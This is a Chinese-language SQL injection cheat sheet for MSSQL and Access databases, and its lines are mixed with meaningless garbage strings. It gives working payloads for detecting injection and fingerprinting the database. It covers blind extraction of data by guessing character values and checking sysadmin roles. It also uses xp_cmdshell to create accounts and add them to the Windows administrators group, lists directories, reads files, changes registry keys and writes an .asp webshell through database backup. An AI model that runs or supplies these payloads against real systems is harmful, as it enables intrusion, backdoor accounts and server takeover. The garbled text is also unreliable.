1.判断是否有注入;and 1=1 ;and 1=2 *HV_$^)=
2.初步判断是否是mssql ;and user>0 X[<#B5
-9+$z|K
3.注入参数是字符'and [查询条件] and ''=' a $'U?%
p8.JJt^
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 525^/d6v
N|)e {|k
5.判断数据库系统 N&k\X]U
Z)(#D($-
;and (select count(*) from sysobjects)>0 mssql jYAm}_?No
ZWuNl!l>
;and (select count(*) from msysobjects)>0 access B!)9
>
Snmv
mhU=^/X
xp3^,x;\X
6.猜数据库 ;and (select Count(*) from [数据库名])>0 qPDRB.K|}
Xs$a^zZ
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 T&S=/cRBK}
^e]O
>CJ
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 e9:pS WA-n
Q8l vwip
9.(1)猜字段的ascii值(access) PW"?*~&
?@MY +r_G
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0
M54czo=l
ZK2&l8
(2)猜字段的ascii值(mssql) L*6<h
^P [#YO
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 A`(Cuw-o
O<>+l*bk
10.测试权限结构(mssql) .pl,ujv
W!9~bBF',
8>vNa
]-X\n
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 5\JV }
%O[1yZh
\
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- FoYs<aER
^-~=U^2tC
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ^l
;Bo3^_
U~7{q
>
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- lQ[JA[
K'"s9b8
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- =:R${F
dYwEVu6q
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 9~K>c
U/v)6:j)4R
;and 1=(select IS_MEMBER('db_owner'));-- %M^Q{`
:5
Ym
-U{a
=/ !A
0@u{(m
11.添加mssql和系统的帐户 4>Q] \\Lc
jt3W.^6HO
;exec master.dbo.sp_addlogin username;-- WoSKN7*
;exec master.dbo.sp_password null,username,password;-- +Ezl.O@z
0T$ `;~
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- =''*'a-P
Y<@_d
;exec master.dbo.xp_cmdshell 'net user username password l:#'i`;
slr>6o%W`
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- U&$I!80.
<A\g*ld
;exec master.dbo.xp_cmdshell 'net user username password /add';-- JiA1yt
>:
@\SU
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- l<"B[
G[zy sxd
mkBQTQGT
.rDao]K
12.(1)遍历目录 _\,4h2(
K_N`My
;create table dirs(paths varchar(100), id int) 9Y2(.~w6X
F[v^43-^_
;insert dirs exec master.dbo.xp_dirtree 'c:\' yM-%x1r~
ecp0 hG`%
;and (select top 1 paths from dirs)>0 ;gRPTk$X3
>u
.u#d e
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) wlP%
U
e6T?2`5P
=7-kD3
H3JDA^5
(2)遍历目录 $K|2k7
A>:31C
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- {+9t!'
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
"JYWsE
c Ct5m
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 "(+aWvb
yN#]Q}4
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 7:.!R^5H
;:)u
rI?
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 6H|T )
9<Th: t|w
Y$3liDeL=
qNkX:|j
13.mssql中的存储过程
yW_goS0
VOmS>'$
xp_regenumvalues 注册表根键, 子键 $@dPIq4o;}
U[@B63];0
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 ;q<:iaY9
=G rg
xp_regread 根键,子键,键值名 h{E9rc1,
lg jY\?
;exec xp_regread LyNur8 Zi
x1#6~283
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 )YLZ"@
_p+q)#.W
xp_regwrite 根键,子键, 值名, 值类型, 值 *b1NVN$
B8V85R
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 6y@o[=m
ck`$ `
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 q1%xk=8
u,@x7a,z
xp_regdeletevalue 根键,子键,值名 X=JAyxY
<,nd]a
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 7^h*rL9
f%STkL)
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 IS!]!s'EI
&gvX<X4e
mgEZiAV ?
4-xg+*()
14.mssql的backup创建webshell Cz4l
M""X_~&I"
use model OgyHX>}bH
D_I_=0qNd
create table cmd(str image); LS1}j WU!
qI\B;&hr(
insert into cmd(str) values (''); b=Q%Jxz?
YccD^w[`B
backup database model to disk='c:\l.asp'; T:udw
N8]d0
Y{m1\s/ o
rP&.`m88n
15.mssql内置函数 [-Mfgw]i
(Yc}V
;and (select @@version)>0 获得Windows的版本号 `q1K%id
ezk:XDi4
;and user_name()='dbo' 判断当前系统的连接用户是不是sa DzvGR)>/
)XD$YI
;and (select user_name())>0 爆当前系统的连接用户 9uY$@7qH
> bSQ}kXe
;and (select db_name())>0 得到当前连接的数据库 X57\sggK
"1$hfs
]P(_
d'}
S
5nri(m
16.简洁的webshell Q<Th*t
Hh<}~s
use model G]fx3=
e%&/K7I "?
create table cmd(str image); qznd'^[
?$X1X`@
insert into cmd(str) values (''); 6imQjtI
e_CgZ
backup database model to disk='g:\wwwtest\l.asp';